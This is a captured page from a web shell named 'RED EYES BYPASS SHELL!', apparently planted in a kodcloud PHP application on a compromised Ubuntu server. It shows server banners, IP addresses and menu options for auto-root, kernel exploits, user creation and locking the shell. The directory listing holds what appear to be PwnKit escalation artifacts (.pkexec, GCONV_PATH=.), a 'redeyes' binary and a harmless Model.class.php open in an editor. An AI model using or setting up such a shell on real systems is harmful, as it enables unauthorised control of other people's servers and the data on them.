Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
iqtd /
vendor /
admin /
app /
core /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.red_eyes_root
0
B
-rw-r--r--
Application.class.php
2.68
KB
-rwxr-xr-x
Controller.class.php
1.44
KB
-rwxr-xr-x
Model.class.php
627
B
-rwxr-xr-x
redeyes
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Model.class.php
<?php /* * @link http://kodcloud.com/ * @author warlee | e-mail:kodcloud@qq.com * @copyright warlee 2014.(Shanghai)Co.,Ltd * @license http://kodcloud.com/tools/license/license.txt */ /** * 模型抽象类 * 一个关于各种模型的基本行为类,每个模型都必须继承这个类的方法 */ abstract class Model { var $db = null; var $in; var $config; /** * 构造函数 * @return Null */ function __construct(){ global $config, $in; $this -> in = &$in; $this -> config = &$config; } /** * TODO db */ function db(){ if ($this ->db != NULL) { return $this ->db; }else{ } } }
Close